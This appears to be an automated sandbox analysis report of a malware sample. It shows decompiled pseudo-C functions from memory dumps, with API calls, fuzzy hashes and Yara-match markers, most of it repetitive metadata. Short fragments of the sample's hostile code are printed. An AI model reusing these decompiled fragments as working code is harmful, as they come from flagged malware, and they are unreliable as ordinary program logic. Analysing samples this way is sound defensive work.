                                0x00419ea7
                                0x00419eb5
                                0x00419eb9

                                APIs
                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 73d8280cdbd175acc7a22ddcd1b8067bd4b8cb9cc4edc79da90c89ad444e4314
                                • Instruction ID: 78d17a804e16074688670281414f483b82c445e985956af87ee8a0228458600b
                                • Opcode Fuzzy Hash: 73d8280cdbd175acc7a22ddcd1b8067bd4b8cb9cc4edc79da90c89ad444e4314
                                • Instruction Fuzzy Hash: A3E0C271200104BFD720DFA5CC85EDB7B28EF44360F158559B90CAB242C530E500CBD0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                0x00419e93
                                0x00419e96
                                0x00419e9f
                                0x00419ea7
                                0x00419eb5
                                0x00419eb9

                                APIs
                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A300C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A30078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A30048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                C-Code - Quality: 93%
                                			E00409A90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B810( &_v284, 0x104);
						E0041BE80( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                0x00409a9b
                                0x00409aa3
                                0x00409aa5
                                0x00409aaa
                                0x00409aaf
                                0x00409ac2
                                0x00409ac7
                                0x00409ad0
                                0x00409adc
                                0x00409aef
                                0x00409af4
                                0x00409af7
                                0x00409b00
                                0x00409b12
                                0x00409b17
                                0x00409b1c
                                0x00000000
                                0x00000000
                                0x00409b1e
                                0x00409b22
                                0x00000000
                                0x00000000
                                0x00409b24
                                0x00000000
                                0x00409b22
                                0x00409b26
                                0x00409b29
                                0x00409b2f
                                0x00409b31
                                0x00409b3c
                                0x00409b41
                                0x00409b44
                                0x00409b51
                                0x00409b5c
                                0x00409b5e
                                0x00409b64
                                0x00409b68
                                0x00409b6b
                                0x00409b6b
                                0x00409b72
                                0x00409b75
                                0x00409b7a
                                0x00409b87
                                0x00409ab6
                                0x00409ab6
                                0x00409ab6

                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A066, Relevance: 3.0, APIs: 2, Instructions: 40memoryCOMMON
